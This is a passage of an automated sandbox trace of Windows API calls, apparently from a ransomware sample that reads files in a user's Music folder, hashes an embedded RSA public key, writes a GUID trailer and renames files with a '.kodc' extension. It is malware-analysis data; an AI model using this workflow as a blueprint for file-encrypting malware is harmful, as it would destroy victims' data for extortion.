0x9ba8d90 [0101.742] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb62c8 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80e8 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6310 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8100 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8148 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.742] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8148 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8130 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.743] GetCurrentThreadId () returned 0x42c [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba86f8 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.744] GetCurrentThreadId () returned 0x42c [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8148 [0101.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8118 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8160 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8130 [0101.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8130 | out: hHeap=0x630000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.748] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x29eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.748] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.748] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.748] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.749] CloseHandle (hObject=0x5cc) returned 1 [0101.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.756] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6-Y7 L9pq1hTh36.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\6-y7 l9pq1hth36.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6-Y7 L9pq1hTh36.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\6-y7 l9pq1hth36.m4a.kodc")) returned 1 [0101.757] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47af760, ftCreationTime.dwHighDateTime=0x1d5c5c9, ftLastAccessTime.dwLowDateTime=0x5ef430f0, ftLastAccessTime.dwHighDateTime=0x1d5c125, ftLastWriteTime.dwLowDateTime=0x5ef430f0, ftLastWriteTime.dwHighDateTime=0x1d5c125, nFileSizeHigh=0x0, nFileSizeLow=0xbffa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6LkDjRHqx5diGXRVJZ-E.wav", cAlternateFileName="6LKDJR~1.WAV")) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6LkDjRHqx5diGXRVJZ-E.wav") returned=".wav" [0101.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\6LkDjRHqx5diGXRVJZ-E.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\6lkdjrhqx5digxrvjz-e.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.758] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=49146) returned 1 [0101.758] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.761] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbfd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.762] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.762] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xbffa, lpOverlapped=0x0) returned 1 [0101.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.763] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.763] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.764] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.764] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.764] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.764] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.764] GetLastError () returned 0x0 [0101.764] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.764] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.765] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.765] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.765] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc000) returned 0x9ba8d90 [0101.765] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6310 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8100 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6358 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8118 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8148 [0101.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.766] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8148 | out: hHeap=0x630000) returned 1 [0101.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8160 | out: hHeap=0x630000) returned 1 [0101.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8160 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8148 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 